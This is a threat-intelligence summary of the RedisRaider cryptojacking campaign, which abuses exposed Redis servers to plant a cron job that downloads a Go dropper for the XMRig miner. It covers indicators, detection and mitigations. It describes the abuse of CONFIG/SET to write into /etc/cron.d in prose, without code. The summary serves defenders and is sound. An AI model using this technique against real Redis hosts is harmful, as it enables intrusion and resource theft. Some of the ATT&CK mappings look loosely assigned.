Full Report
Cybersecurity researchers are calling attention to a new Linux cryptojacking campaign that's targeting publicly accessible Redis servers. The malicious activity has been codenamed RedisRaider by Datadog Security Labs. "RedisRaider aggressively scans randomized portions of the IPv4 space and uses legitimate Redis configuration commands to execute malicious cron jobs on vulnerable systems,"
Analysis Summary
# Tool/Technique: RedisRaider (Cryptojacking Campaign)
## Overview
RedisRaider is a cryptojacking campaign observed targeting publicly accessible Redis servers running on Linux hosts. The campaign abuses legitimate Redis configuration commands to execute malicious cron jobs, ultimately deploying a Go-based payload that installs and executes the XMRig cryptocurrency miner. The infrastructure also supports a web-based Monero miner for diversified revenue.
## Technical Details
- Type: Malware Campaign / Tool Usage
- Platform: Linux
- Capabilities: Scanning public IPv4 space for Redis, exploiting configuration settings to establish persistence via cron jobs, executing remote payloads, deploying XMRig miner, and supporting web-based mining.
- First Seen: May 20, 2025 (Based on article date)
## MITRE ATT&CK Mapping
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols
- **TA0002 - Execution**
- T1059 - Command and Scripting Interpreter
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- **TA0003 - Persistence**
- T1548 - Abuse Elevation Control Mechanism
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information
- T1027.003 - Obfuscated Files or Information: Steganography (Potential use of encoded script)
## Functionality
### Core Capabilities
- **Discovery:** Aggressively scans randomized portions of the IPv4 space to find publicly accessible Redis instances.
- **Vulnerability Exploitation:** Uses the `INFO` command to verify if a target is a Linux host.
- **Persistence Establishment:** Abuses the Redis `SET` command to inject a malicious cron job. It then uses the `CONFIG` command to change the Redis working directory to `/etc/cron.d` and writes a file named "apache" (a database/cron job file) to that location for scheduled execution.
- **Payload Delivery:** The scheduled cron job executes a Base64-encoded shell script that downloads the primary RedisRaider binary.
### Advanced Features
- **Multi-stage Infection:** The primary Go-based payload acts as a dropper for the XMRig miner.
- **Propagation:** The payload is designed to propagate the malware to other vulnerable Redis instances, expanding its reach.
- **Anti-Forensics:** Implements short-key Time-To-Live (TTL) settings and configures database changes to minimize forensic analysis time.
- **Revenue Diversification:** Runs both server-side cryptojacking (XMRig) and hosts a web-based Monero miner.
## Indicators of Compromise
- File Hashes: [None provided in the context]
- File Names: "apache" (database/cron job file in `/etc/cron.d`)
- Registry Keys: [N/A for Linux persistence mechanism described]
- Network Indicators: Remote server hosting the RedisRaider binary (C2 servers need external analysis).
- Behavioral Indicators: Use of legitimate Redis commands (`INFO`, `SET`, `CONFIG`) to establish persistence using `/etc/cron.d`. Base64 encoded shell script execution.
## Associated Threat Actors
- Threat actors conducting cryptojacking campaigns targeting Redis. (No specific named group provided, but associated with the "RedisRaider" campaign.)
## Detection Methods
- Signature-based detection: Rules targeting specific hashes of the Go binary.
- Behavioral detection: Monitoring for the execution of unexpected shell scripts triggered by cron, especially those downloaded from external sources, and the use of Redis commands to manipulate system files (`/etc/cron.d`). Look for processes executing XMRig.
- YARA rules: [Not provided in the context]
## Mitigation Strategies
- **Prevention measures:** Secure all Redis instances by binding them only to localhost or internal networks and ensuring they are not publicly accessible without strict authentication.
- **Hardening recommendations:** Implement strong authentication for Redis instances. Review and audit the contents of `/etc/cron.d` frequently for unauthorized entries (like the "apache" file). Disable or restrict shell command execution capabilities within Redis if possible, though the primary defense is network isolation.
## Related Tools/Techniques
- XMRig Miner (The ultimate payload executed)
- Cryptojacking techniques exploiting common misconfigurations (e.g., exposed databases, insecure services).
- BAV2ROPC (Mentioned in an unrelated context in the article, used for Entra ID abuse).